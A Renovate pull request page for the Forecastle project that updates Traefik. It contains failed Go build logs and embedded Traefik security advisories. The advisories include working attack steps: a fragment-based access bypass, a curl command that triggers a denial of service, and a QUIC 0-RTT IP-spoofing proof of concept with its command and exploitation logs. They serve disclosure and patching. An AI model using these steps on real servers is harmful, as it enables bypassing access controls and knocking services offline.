Closed renovate[bot] closed 3 months ago
Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.
♻ Renovate will retry this branch, including artifacts, only when one of the following happens:
The artifact failure details are included below:
Command failed: go get -d -t ./...
go: downloading k8s.io/apimachinery v0.26.3
go: downloading k8s.io/client-go v0.26.3
go: downloading github.com/spf13/viper v1.18.2
go: downloading github.com/openshift/client-go v0.0.0-20210521082421-73d9475a9142
go: downloading github.com/traefik/traefik/v2 v2.11.2
go: downloading k8s.io/api v0.26.3
go: downloading github.com/openshift/api v0.0.0-20210720160326-96bb0f993a66
go: downloading mvdan.cc/xurls/v2 v2.5.0
go: downloading github.com/onrik/logrus v0.11.0
go: downloading github.com/sirupsen/logrus v1.9.3
go: downloading github.com/gobuffalo/packr/v2 v2.8.3
go: downloading github.com/gorilla/mux v1.8.1
go: downloading github.com/gogo/protobuf v1.3.2
go: downloading github.com/google/gofuzz v1.2.0
go: downloading k8s.io/klog/v2 v2.90.1
go: downloading sigs.k8s.io/structured-merge-diff/v4 v4.2.3
go: downloading github.com/golang/protobuf v1.5.3
go: downloading github.com/google/gnostic v0.5.7-v3refs
go: downloading golang.org/x/time v0.5.0
go: downloading k8s.io/utils v0.0.0-20230313181309-38a27ef9d749
go: downloading github.com/evanphx/json-patch v4.12.0+incompatible
go: downloading golang.org/x/net v0.24.0
go: downloading github.com/fsnotify/fsnotify v1.7.0
go: downloading github.com/mitchellh/mapstructure v1.5.0
go: downloading github.com/sagikazarmark/locafero v0.4.0
go: downloading github.com/sagikazarmark/slog-shim v0.1.0
go: downloading github.com/spf13/afero v1.11.0
go: downloading github.com/spf13/cast v1.6.0
go: downloading github.com/spf13/pflag v1.0.5
go: downloading github.com/imdario/mergo v0.3.16
go: downloading golang.org/x/term v0.19.0
go: downloading golang.org/x/sys v0.19.0
go: downloading github.com/gobuffalo/packd v1.0.1
go: downloading github.com/markbates/oncer v1.0.0
go: downloading github.com/markbates/safe v1.0.1
go: downloading gopkg.in/inf.v0 v0.9.1
go: downloading sigs.k8s.io/json v0.0.0-20220713155537-f223a00ba0e2
go: downloading github.com/go-logr/logr v1.4.1
go: downloading github.com/json-iterator/go v1.1.12
go: downloading gopkg.in/yaml.v2 v2.4.0
go: downloading google.golang.org/protobuf v1.33.0
go: downloading k8s.io/kube-openapi v0.0.0-20221012153701-172d655c2280
go: downloading sigs.k8s.io/yaml v1.3.0
go: downloading gopkg.in/yaml.v3 v3.0.1
go: downloading github.com/pkg/errors v0.9.1
go: downloading github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc
go: downloading golang.org/x/oauth2 v0.16.0
go: downloading github.com/google/go-cmp v0.6.0
go: downloading github.com/sourcegraph/conc v0.3.0
go: downloading golang.org/x/exp v0.0.0-20240404231335-c0f41cb1a7a0
go: downloading golang.org/x/text v0.14.0
go: downloading github.com/subosito/gotenv v1.6.0
go: downloading github.com/hashicorp/hcl v1.0.0
go: downloading gopkg.in/ini.v1 v1.67.0
go: downloading github.com/magiconair/properties v1.8.7
go: downloading github.com/pelletier/go-toml/v2 v2.1.0
go: downloading github.com/karrick/godirwalk v1.16.1
go: downloading github.com/markbates/errx v1.1.0
go: downloading github.com/gobuffalo/logger v1.0.6
go: downloading github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd
go: downloading github.com/modern-go/reflect2 v1.0.2
go: downloading github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822
go: downloading k8s.io/apiextensions-apiserver v0.26.3
go: downloading github.com/emicklei/go-restful/v3 v3.11.0
go: downloading github.com/go-openapi/swag v0.19.14
go: downloading github.com/go-openapi/jsonreference v0.20.0
go: downloading google.golang.org/appengine v1.6.7
go: downloading go.uber.org/multierr v1.9.0
go: downloading github.com/traefik/paerser v0.2.0
go: downloading github.com/go-acme/lego/v4 v4.16.1
go: downloading github.com/patrickmn/go-cache v2.1.0+incompatible
go: downloading github.com/mailru/easyjson v0.7.7
go: downloading github.com/go-openapi/jsonpointer v0.19.5
go: downloading go.uber.org/atomic v1.11.0
go: downloading github.com/miekg/dns v1.1.58
go: downloading github.com/cenkalti/backoff/v4 v4.2.1
go: downloading github.com/josharian/intern v1.0.0
go: downloading golang.org/x/crypto v0.22.0
go: downloading github.com/go-jose/go-jose/v4 v4.0.1
go: downloading golang.org/x/tools v0.20.0
go: downloading golang.org/x/sync v0.7.0
go: downloading golang.org/x/mod v0.17.0
go: downloading github.com/traefik/traefik v1.7.34
go: github.com/stakater/Forecastle/v1/pkg/kube/wrappers imports
github.com/traefik/traefik/v2/pkg/provider/kubernetes/crd/traefik/v1alpha1: cannot find module providing package github.com/traefik/traefik/v2/pkg/provider/kubernetes/crd/traefik/v1alpha1
@renovate[bot] Yikes! You better fix it before anyone else finds out! Build has Failed!
Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.
♻ Renovate will retry this branch, including artifacts, only when one of the following happens:
The artifact failure details are included below:
Command failed: go get -d -t ./...
go: downloading k8s.io/apimachinery v0.26.3
go: downloading k8s.io/client-go v0.26.3
go: downloading github.com/spf13/viper v1.18.2
go: downloading github.com/openshift/client-go v0.0.0-20210521082421-73d9475a9142
go: downloading github.com/traefik/traefik/v2 v2.11.6
go: downloading k8s.io/api v0.26.3
go: downloading github.com/openshift/api v0.0.0-20210720160326-96bb0f993a66
go: downloading mvdan.cc/xurls/v2 v2.5.0
go: downloading github.com/onrik/logrus v0.11.0
go: downloading github.com/sirupsen/logrus v1.9.3
go: downloading github.com/gobuffalo/packr/v2 v2.8.3
go: downloading github.com/gorilla/mux v1.8.1
go: downloading github.com/gogo/protobuf v1.3.2
go: downloading github.com/google/gofuzz v1.2.0
go: downloading k8s.io/klog/v2 v2.90.1
go: downloading sigs.k8s.io/structured-merge-diff/v4 v4.2.3
go: downloading github.com/golang/protobuf v1.5.4
go: downloading github.com/google/gnostic v0.5.7-v3refs
go: downloading golang.org/x/time v0.5.0
go: downloading k8s.io/utils v0.0.0-20230313181309-38a27ef9d749
go: downloading github.com/evanphx/json-patch v4.12.0+incompatible
go: downloading golang.org/x/net v0.26.0
go: downloading github.com/fsnotify/fsnotify v1.7.0
go: downloading github.com/mitchellh/mapstructure v1.5.0
go: downloading github.com/sagikazarmark/locafero v0.4.0
go: downloading github.com/sagikazarmark/slog-shim v0.1.0
go: downloading github.com/spf13/afero v1.11.0
go: downloading github.com/spf13/cast v1.6.0
go: downloading github.com/spf13/pflag v1.0.5
go: downloading github.com/imdario/mergo v0.3.16
go: downloading golang.org/x/term v0.21.0
go: downloading golang.org/x/sys v0.21.0
go: downloading github.com/gobuffalo/packd v1.0.1
go: downloading github.com/markbates/oncer v1.0.0
go: downloading github.com/markbates/safe v1.0.1
go: downloading gopkg.in/inf.v0 v0.9.1
go: downloading sigs.k8s.io/json v0.0.0-20220713155537-f223a00ba0e2
go: downloading github.com/go-logr/logr v1.4.1
go: downloading github.com/json-iterator/go v1.1.12
go: downloading gopkg.in/yaml.v2 v2.4.0
go: downloading google.golang.org/protobuf v1.33.0
go: downloading k8s.io/kube-openapi v0.0.0-20221012153701-172d655c2280
go: downloading sigs.k8s.io/yaml v1.3.0
go: downloading github.com/pkg/errors v0.9.1
go: downloading gopkg.in/yaml.v3 v3.0.1
go: downloading github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc
go: downloading github.com/google/go-cmp v0.6.0
go: downloading golang.org/x/oauth2 v0.21.0
go: downloading github.com/sourcegraph/conc v0.3.0
go: downloading golang.org/x/exp v0.0.0-20240506185415-9bf2ced13842
go: downloading golang.org/x/text v0.16.0
go: downloading github.com/subosito/gotenv v1.6.0
go: downloading github.com/hashicorp/hcl v1.0.0
go: downloading gopkg.in/ini.v1 v1.67.0
go: downloading github.com/magiconair/properties v1.8.7
go: downloading github.com/pelletier/go-toml/v2 v2.1.0
go: downloading github.com/karrick/godirwalk v1.16.1
go: downloading github.com/markbates/errx v1.1.0
go: downloading github.com/gobuffalo/logger v1.0.6
go: downloading github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd
go: downloading github.com/modern-go/reflect2 v1.0.2
go: downloading github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822
go: downloading k8s.io/apiextensions-apiserver v0.26.3
go: downloading github.com/emicklei/go-restful/v3 v3.11.0
go: downloading github.com/go-openapi/swag v0.19.14
go: downloading github.com/go-openapi/jsonreference v0.20.0
go: downloading github.com/traefik/paerser v0.2.0
go: downloading github.com/go-acme/lego/v4 v4.17.4
go: downloading github.com/patrickmn/go-cache v2.1.0+incompatible
go: downloading go.uber.org/multierr v1.9.0
go: downloading github.com/mailru/easyjson v0.7.7
go: downloading github.com/miekg/dns v1.1.59
go: downloading github.com/go-openapi/jsonpointer v0.19.5
go: downloading github.com/cenkalti/backoff/v4 v4.3.0
go: downloading go.uber.org/atomic v1.11.0
go: downloading github.com/josharian/intern v1.0.0
go: downloading golang.org/x/crypto v0.24.0
go: downloading golang.org/x/tools v0.22.0
go: downloading github.com/go-jose/go-jose/v4 v4.0.2
go: downloading golang.org/x/sync v0.7.0
go: downloading golang.org/x/mod v0.18.0
go: downloading github.com/traefik/traefik/v2 v2.11.7
go: downloading github.com/traefik/traefik v1.7.34
go: github.com/stakater/Forecastle/v1/pkg/kube/wrappers imports
github.com/traefik/traefik/v2/pkg/provider/kubernetes/crd/traefik/v1alpha1: cannot find module providing package github.com/traefik/traefik/v2/pkg/provider/kubernetes/crd/traefik/v1alpha1
@renovate[bot] Yikes! You better fix it before anyone else finds out! Build has Failed!
@renovate[bot] Yikes! You better fix it before anyone else finds out! Build has Failed!
@renovate[bot] Yikes! You better fix it before anyone else finds out! Build has Failed!
@renovate[bot] Yikes! You better fix it before anyone else finds out! Build has Failed!
This PR contains the following updates:
v2.9.10
->v2.11.6
GitHub Vulnerability Alerts
CVE-2023-47106
Summary
When a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates the RFC because in the origin-form the URL should only contain the absolute path and the query.
When this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control restrictions.
Details
For example, we have this Nginx configuration:
This can be bypassed when the attacker is requesting to /#/../admin
This won’t be vulnerable if the backend server follows the RFC and ignores any characters after the fragment.
However, if Nginx is chained with another reverse proxy which automatically URL encode the character # (Traefik) the URL will become
/%23/../admin
And allow the attacker to completely bypass the Access Restriction from the Nginx Front-End proxy.
Here is a diagram to summarize the attack:
PoC
This is the POC docker I've set up. It contains Nginx, Traefik proxies and a backend server running PHP.
https://drive.google.com/file/d/1vLnA0g7N7ZKhLNmHmuJ4JJjV_J2akNMt/view?usp=sharing
Impact
This allows the attacker to completely bypass the Access Restriction from Front-End proxy.
CVE-2023-47124
Impact
There is a potential vulnerability in Traefik managing the ACME HTTP challenge.
When Traefik is configured to use the HTTPChallenge to generate and renew the Let's Encrypt TLS certificates, the delay authorized to solve the challenge (50 seconds) can be exploited by attackers (slowloris attack).
Patches
Workarounds
Replace the HTTPChallenge with the TLSChallenge or the DNSChallenge.
For more information
If you have any questions or comments about this advisory, please open an issue.
CVE-2023-47633
Summary
The traefik docker container uses 100% CPU when it serves as its own backend, which is an automatically generated route resulting from the Docker integration in the default configuration.
Details
While attempting to set up Traefik to handle traffic for Docker containers, I observed in the webUI a rule with the following information:
Host(traefik-service) | webwebsecure | traefik-service@docker | traefik-service
I assumed that this is something internal; however, I wondered why it would have a host rule on the web entrypoint configured.
So I have send a request with that hostname with
curl -v --resolve "traefik-service:80:xxx.xxx.xxx.xxx" http://traefik-service
. That made my whole server unresponsive.I assume the name comes from a docker container with that name, traefik itself:
PoC
Start traefik with
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -p 80:80 --name foo -p 8080:8080 traefik:v2.10 --api.insecure=true --providers.docker
curl -v --resolve "foo:80:127.0.0.1" http://foo
looks like this creates an endless loop of request.
Knowing the name of the docker container seems to be enough to trigger this, if the docker backend is used.
Impact
Server is unreachable and uses 100% CPU
CVE-2024-28869
There is a potential vulnerability in Traefik managing requests with
Content-length
and nobody
.Sending a
GET
request to any Traefik endpoint with theContent-length
request header results in an indefinite hang with the default configuration. This vulnerability can be exploited by attackers to induce a denial of service.Patches
Workarounds
For affected versions, this vulnerability can be mitigated by configuring the readTimeout option.
For more information
If you have any questions or comments about this advisory, please open an issue.
GHSA-7f4j-64p6-5h5v
There is a potential vulnerability in Traefik managing HTTP/2 connections.
More details in the CVE-2023-45288.
Patches
Workarounds
No workaround
For more information
If you have any questions or comments about this advisory, please open an issue.
GHSA-f7cq-5v43-8pwp
Impact
There is a vulnerability in GO managing malformed DNS message, which impacts Traefik. This vulnerability could be exploited to cause a denial of service.
References
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
GHSA-7jmw-8259-q9jx
Impact
There is a vulnerability in Go managing various Is methods (IsPrivate, IsLoopback, etc) for IPv4-mapped IPv6 addresses.
They didn't work as expected returning false for addresses which would return true in their traditional IPv4 forms.
References
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
GHSA-rvj4-q8q5-8grf
Impact
There is a vulnerability in Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability.
References
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
CVE-2024-39321
Impact
There is a vulnerability in Traefik that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.
Patches
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
Original Description
### Summary Bypassing IP allow-lists in traefik via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses. ### Details HTTP/3 supports sending HTTP requests as early data during QUIC 0-RTT handshakes to reduce RTT overhead for connection resumptions. Early data is sent and received before the handshake is completed and the client's IP address is validated. The initial packet containing the QUIC 0-RTT handshake information and the early data HTTP request are sent as a single UDP datagram. Due to UDP being used by QUIC, the source IP address can be spoofed. When HTTP/3 servers process early data requests, the application layer only sees the unvalidated - possibly spoofed - IP address. First, attackers have to obtain a session ticket from the HTTP/3 server. For that, attackers have to establish an HTTP/3 connection to the server - using their real IP address - and wait for the server to send a session ticket. Note that attackers do not have to send an actual HTTP request over the established connection. After obtaining the session ticket, the attacker can close the connection. In the second step, attackers need to prepare a UDP datagram containing a QUIC initial packet with a TLS ClientHello and the session ticket, a QUIC 0-RTT packet with early data encrypted with the pre-shared key from the session ticket, and an HTTP/3 request (open request stream, HEADERS frame, optionally DATA frame). This prepared UDP datagram can then be sent to the server with an arbitrarily spoofed source IP address in the IP packet header. When processing the HTTP request, the server trusts the spoofed IP address, which can be used to bypass IP-allow/block-lists. A prerequisite for this attack to succeed is that HTTP/3 servers have implemented and enabled 0-RTT early data for HTTP/3 requests (and no mitigations are in place). A caveat is that attackers are not able to receive the server's response because the response is sent to the spoofed source IP address, making it a blind attack. Another limitation is that the request has to fit in a single UDP datagram, whose size is limited by the network path's MTU (minus some bytes for headers of encapsulating protocols such as HTTP/3, QUIC, UDP, IPv4/IPv6). ### Impact IP allow-lists can be bypassed. Early data in QUIC 0-RTT handshakes is enabled when HTTP/3 support is enabled. ### Mitigation * Consider responding with HTTP status code 425 Too Early when 0-RTT early data requests match `ipAllowList.sourceRange` middleware. See RFC 8470 Section 3 for more information. * Alternatively, delay processing of 0-RTT early data requests until the handshake is completed and the client's IP address is validated when 0-RTT early data requests match `ipAllowList.sourceRange` middleware. Additionally, it is recommended to implement RFC 8470 and set the `Early-Data: 1` header when forwarding early data requests to backend services. Currently, applications are not able to distinguish between 0-RTT early data requests and regular requests. When applications use the client's IP in `X-Forwarded-For` headers (e.g. for rate limiting), they are not able to detect potential IP spoofing on the application layer. ### Proof of Concept Traefik is used as a HTTP/3 reverse proxy for a backend application. An IP allow list is configured to only allow access from the IP address 1.3.3.7. ```yaml # /etc/traefik/traefik.yml entryPoints: websecure: address: ":4439" http3: {} asDefault: true providers: file: filename: /etc/traefik/provider.yml log: level: DEBUG ``` ```yaml # /etc/traefik/provider.yml http: routers: default: rule: "PathPrefix(`/`)" tls: {} middlewares: - ipfilter service: backend middlewares: ipfilter: ipAllowList: sourceRange: - "1.3.3.7/32" services: backend: loadBalancer: servers: - url: "http://127.0.0.1:8000" ``` By performing the steps described above, attackers are able to bypass the IP allow list and send requests to the backend application. The security impact depends on the application's logic. Please find attached a proof-of-concept docker-compose setup to demonstrate the vulnerability. It consists of a traefik reverse proxy, a backend application, and an attacker container. The attack script performs following request: ``` python3 http3_ip_spoofing.py https://127.0.0.1:4439/cmd -X POST -d "cmd=echo%20worked>>/tmp/spoofed" -H "X-Header: test" --spoofed-ip=1.3.3.7 ``` Note: We use a custom python script because, `curl` does not support QUIC 0-RTT requests and session resumtion yet. [proof-of-concept.zip](https://togithub.com/user-attachments/files/16044048/proof-of-concept.zip) Here are logs of a successful exploitation in the attached docker compose setup: ``` docker compose up # Traefik startup logs h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:100 > Traefik version 3.0.3 built on 2024-06-18T14:31:20Z version=3.0.3 h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/cmd/traefik/traefik.go:107 > Static configuration loaded [json] staticConfiguration={"entryPoints":{"websecure":{"address":":4439","asDefault":true,"forwardedHeaders":{},"http":{},"http2":{"maxConcurrentStreams":250},"http3":{},"transport":{"lifeCycle":{"graceTimeOut":"10s"},"respondingTimeouts":{"idleTimeout":"3m0s","readTimeout":"1m0s"}},"udp":{"timeout":"3s"}}},"global":{"checkNewVersion":true},"log":{"format":"common","level":"DEBUG"},"providers":{"file":{"filename":"/etc/traefik/provider.yml","watch":true},"providersThrottleDuration":"2s"},"serversTransport":{"maxIdleConnsPerHost":200},"tcpServersTransport":{"dialKeepAlive":"15s","dialTimeout":"30s"}} h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:605 > h3_traefik-1 | Stats collection is disabled. h3_traefik-1 | Help us improve Traefik by turning this feature on :) h3_traefik-1 | More details on: https://doc.traefik.io/traefik/contributing/data-collection/ h3_traefik-1 | h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:73 > Starting provider aggregator aggregator.ProviderAggregator h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/server_entrypoint_tcp.go:220 > Starting TCP Server entryPointName=websecure h3_traefik-1 | 2024-06-29T11:52:58Z DBG log/log.go:245 > 2024/06/29 11:52:58 sys_conn.go:36: failed to sufficiently increase receive buffer size (was: 208 kiB, wanted: 2048 kiB, got: 416 kiB). See https://github.com/quic-go/quic-go/wiki/UDP-Buffer-Sizes for details. h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *file.Provider h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *file.Provider provider configuration config={"filename":"/etc/traefik/provider.yml","watch":true} h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik/provider.yml h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *traefik.Provider h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *traefik.Provider provider configuration config={} h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *acme.ChallengeTLSALPN h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *acme.ChallengeTLSALPN provider configuration config={} h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"middlewares":{"ipfilter":{"ipAllowList":{"sourceRange":["1.3.3.7/32"]}}},"routers":{"default":{"middlewares":["ipfilter"],"rule":"PathPrefix(`/`)","service":"backend","tls":{}}},"services":{"backend":{"loadBalancer":{"passHostHeader":true,"responseForwarding":{"flushInterval":"100ms"},"servers":[{"url":"http://127.0.0.1:8000"}]}}}},"tcp":{},"tls":{},"udp":{}} providerName=file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"serversTransports":{"default":{"maxIdleConnsPerHost":200}},"services":{"noop":{}}},"tcp":{"serversTransports":{"default":{"dialKeepAlive":"15s","dialTimeout":"30s"}}},"tls":{},"udp":{}} providerName=internal h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/aggregator.go:51 > No entryPoint defined for this router, using the default one(s) instead entryPointName=["websecure"] routerName=default h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:321 > No default certificate, fallback to the internal generated certificate tlsStoreName=default h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:259 > Creating load-balancer entryPointName=websecure routerName=default@file serviceName=backend@file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:301 > Creating server entryPointName=websecure routerName=default@file serverName=754e0da3b063885a serviceName=backend@file target=http://127.0.0.1:8000 h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:33 > Creating middleware entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:57 > Setting up IPAllowLister with sourceRange: [1.3.3.7/32] entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/observability/middleware.go:33 > Adding tracing to middleware entryPointName=websecure middlewareName=ipfilter@file routerName=default@file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/recovery/recovery.go:22 > Creating middleware entryPointName=websecure middlewareName=traefik-internal-recovery middlewareType=Recover # Attack script establishes an HTTP/3 connection to traefik to obtain a session ticket attack-ipspoofing-1 | INFO:client:Initially connecting to server to get a session ticket attack-ipspoofing-1 | INFO:quic:[e29b2e2fd9a76162] ALPN negotiated protocol h3 attack-ipspoofing-1 | INFO:quic:[e29b2e2fd9a76162] Connection close sent (code 0x0, reason ) attack-ipspoofing-1 | INFO:client:Initial connection done # Traefik accepts the HTTP/3 connection and issues as session ticket h3_traefik-1 | 2024-06-29T11:53:03Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:228 > Serving default certificate for request: "" # Attack script sends a 0-RTT early data request in a UDP datagram with a spoofed source IP attack-ipspoofing-1 | INFO:client:Building 0-RTT QUIC packet attack-ipspoofing-1 | INFO:client:Setting up iptables rule for source IP spoofing attack-ipspoofing-1 | INFO:client:Sending 0-RTT packet # Traefik accepts and forwards the request to the backend service, bypassing the IP allow list h3_traefik-1 | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:85 > Accepting IP 1.3.3.7 middlewareName=ipfilter@file middlewareType=IPAllowLister h3_traefik-1 | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/server/service/loadbalancer/wrr/wrr.go:196 > Service selected by WRR: 754e0da3b063885a # Backend service receives and processes the request backend-1 | INFO:root:Request: {"ip": "1.3.3.7", "method": "POST", "path": "/cmd", "data": "cmd=echo%20worked>>/tmp/spoofed", "headers": {"Host": "127.0.0.1:4439", "Content-Length": "31", "Content-Type": "application/x-www-form-urlencoded", "X-Forwarded-For": "1.3.3.7", "X-Forwarded-Host": "127.0.0.1:4439", "X-Forwarded-Port": "4439", "X-Forwarded-Proto": "https", "X-Forwarded-Server": "work", "X-Header": "test", "X-Real-Ip": "1.3.3.7", "Accept-Encoding": "gzip"}} backend-1 | INFO:root:Executing command: echo worked>>/tmp/spoofed ```Release Notes
traefik/traefik (github.com/traefik/traefik/v2)
### [`v2.11.6`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2116-2024-07-02) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.5...v2.11.6) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.5...v2.11.6) **Bug fixes:** - **\[ecs]** Fix ECS config for OIDC + IRSA ([#10814](https://togithub.com/traefik/traefik/pull/10814) by [mmatur](https://togithub.com/mmatur)) - **\[http3]** Disable QUIC 0-RTT ([#10867](https://togithub.com/traefik/traefik/pull/10867) by [mmatur](https://togithub.com/mmatur)) - **\[middleware,server]** Remove interface names from IPv6 ([#10813](https://togithub.com/traefik/traefik/pull/10813) by [JeroenED](https://togithub.com/JeroenED)) **Documentation:** - **\[docker,acme]** Fix a typo in the ACME docker-compose docs ([#10866](https://togithub.com/traefik/traefik/pull/10866) by [ciacon](https://togithub.com/ciacon)) - Update Advanced Capabilities Callout ([#10846](https://togithub.com/traefik/traefik/pull/10846) by [tomatokoolaid](https://togithub.com/tomatokoolaid)) - Update maintainers ([#10834](https://togithub.com/traefik/traefik/pull/10834) by [emilevauge](https://togithub.com/emilevauge)) - Fix readme badge for Semaphore CI ([#10830](https://togithub.com/traefik/traefik/pull/10830) by [mmatur](https://togithub.com/mmatur)) - Fix typo in keepAliveMaxTime docs ([#10825](https://togithub.com/traefik/traefik/pull/10825) by [shochdoerfer](https://togithub.com/shochdoerfer)) ### [`v2.11.5`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2115-2024-06-18) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.4...v2.11.5) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.4...v2.11.5) **Bug fixes:** - **\[acme]** Update go-acme/lego to v4.17.4 ([#10803](https://togithub.com/traefik/traefik/pull/10803) by [ldez](https://togithub.com/ldez)) **Documentation:** - Update the supported versions table ([#10798](https://togithub.com/traefik/traefik/pull/10798) by [nmengin](https://togithub.com/nmengin)) ### [`v2.11.4`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2114-2024-06-10) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.3...v2.11.4) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.3...v2.11.4) **Bug fixes:** - **\[acme]** Update go-acme/lego to v4.17.3 ([#10768](https://togithub.com/traefik/traefik/pull/10768) by [ldez](https://togithub.com/ldez)) **Documentation:** - **\[acme]** Fix .com and .org domain examples ([#10635](https://togithub.com/traefik/traefik/pull/10635) by [rptaylor](https://togithub.com/rptaylor)) - **\[middleware]** Add a note about the Ratelimit middleware's behavior when the sourceCriterion header is missing ([#10752](https://togithub.com/traefik/traefik/pull/10752) by [dgutzmann](https://togithub.com/dgutzmann)) - Add user guides link to getting started ([#10785](https://togithub.com/traefik/traefik/pull/10785) by [norlinhenrik](https://togithub.com/norlinhenrik)) - Remove helm default repo warning as repo has been long deprecated ([#10772](https://togithub.com/traefik/traefik/pull/10772) by [corneliusroemer](https://togithub.com/corneliusroemer)) ### [`v2.11.3`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2113-2024-05-17) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.2...v2.11.3) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.2...v2.11.3) **Bug fixes:** - **\[server]** Remove deadlines for non-TLS connections ([#10615](https://togithub.com/traefik/traefik/pull/10615) by [rtribotte](https://togithub.com/rtribotte)) - **\[webui]** Display of Content Security Policy values getting out of screen ([#10710](https://togithub.com/traefik/traefik/pull/10710) by [brandonfl](https://togithub.com/brandonfl)) - **\[webui]** Fix provider icon size ([#10621](https://togithub.com/traefik/traefik/pull/10621) by [framebassman](https://togithub.com/framebassman)) **Documentation:** - **\[k8s/crd]** Fix migration/v2.md ([#10658](https://togithub.com/traefik/traefik/pull/10658) by [stemar94](https://togithub.com/stemar94)) - **\[k8s/gatewayapi]** Fix HTTPRoute use of backendRefs ([#10630](https://togithub.com/traefik/traefik/pull/10630) by [sakaru](https://togithub.com/sakaru)) - **\[k8s/gatewayapi]** Fix HTTPRoute path type ([#10629](https://togithub.com/traefik/traefik/pull/10629) by [sakaru](https://togithub.com/sakaru)) - **\[k8s]** Improve mirroring example on Kubernetes ([#10701](https://togithub.com/traefik/traefik/pull/10701) by [mloiseleur](https://togithub.com/mloiseleur)) - Consistent entryPoints capitalization in CLI flag usage ([#10650](https://togithub.com/traefik/traefik/pull/10650) by [jnoordsij](https://togithub.com/jnoordsij)) - Fix unfinished migration sentence for v2.11.2 ([#10633](https://togithub.com/traefik/traefik/pull/10633) by [kevinpollet](https://togithub.com/kevinpollet)) ### [`v2.11.2`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2112-2024-04-11) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.1...v2.11.2) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.1...v2.11.2) **Bug fixes:** - **\[server]** Revert LingeringTimeout and change default value for ReadTimeout 